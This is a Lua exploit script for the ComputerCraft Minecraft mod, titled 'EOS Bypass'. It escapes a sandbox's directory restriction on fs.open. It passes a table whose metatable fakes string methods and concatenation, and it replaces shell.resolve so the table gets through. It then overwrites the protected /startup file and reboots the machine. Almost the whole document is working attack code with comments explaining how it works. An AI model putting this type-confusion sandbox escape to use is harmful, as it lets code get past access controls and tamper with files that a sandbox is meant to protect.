ComputerCraft EOS Bypass

--[[
    Metatable Injection     Trystan Cannon
                            12 March 2013

    This script uses metatables and their
    respective metamethods to inject into
    functions that restrict certain actions
    based on string values.

    Using metamethods, we can bypass string
    checks and cause certain flags to pass
    even though we're using a metatable
    rather than an actual string.

    This is the function we'll be bypassing:

        fs.open = function(path, mode)
            path = shell.resolve(path);

            if(mode == 'r')then
                if(path:sub(1,13)=="rom/programs/")then
                    return fsOpen(path, mode);
                end
            end

            if(path:sub(1,iVirtualDir)==virtualDir)then
                return fsOpen(path, mode);
            else
                return fsOpen(virtualDirCurrent.."/"..path, mode);
            end

            return nil;
        end
]]--


--======================================================================
-- Variables:

local targetPath       = "/startup"    -- The path of the file we want to get a handle on through the StringBomb.
local oldShellResolve  = shell.resolve -- This is the old shell.resolve function that we need to replace in order to keep the path table given
                                       -- to 'fs.open' to remain our table.
local virtualDirectory = "Not the virtual directory." -- This is the area where the program has sandboxed our code to. We want this to fail, by the way.

local StringBomb = { -- This is the table that the __index metamethod will be referencing for any functions invoked on our 'StringBomb' object.
    -- When substring is called on this method, we want it not to return the virtual directory
    -- the 'fs.open' method is looking for.
    ["sub"] = function (self)
        return virtualDirectory
    end,

    -- When self:len() is called by our replaced shell.resolve function, we want it
    -- to return -1 so that we can identify our table.
    ["len"] = function (self)
        return -1
    end
}

StringBomb.metatable = { -- The metatable for the StringBomb. This will allow us to sneak into the 'fsOpen' call when the virtual directory is concatenated with us.
    __index  = StringBomb,

    -- When someone tries to concatenate a StringBomb with another string, then return
    -- the target of the file we want to get in to.
    __concat = function (firstOperand, secondOperand)
        return targetPath
    end
}
--======================================================================


--======================================================================
-- Function replacement:

-- Replace the 'shell.resolve' function so that our table, when passed to 'fs.open', will remain the same rather
-- than being a string.
shell.resolve = function (path)
    if path:len() == -1 then
        return path
    end

    return oldShellResolve (path)
end
--======================================================================


--======================================================================
-- Main:

-- Create the StringBomb object we'll use to get into the startup file.
local startupBomb = {}
setmetatable (startupBomb, StringBomb.metatable)

-- Get a file handle using our StringBomb.
local startupFileHandle = fs.open (startupBomb, 'w')
startupFileHandle.write ("print ('Startup accessed.')")
startupFileHandle.close()

-- Prompt the user that we have succeeded.
print ("Startup overwritten. Rebooting.")
sleep (0.5)
os.reboot()
--======================================================================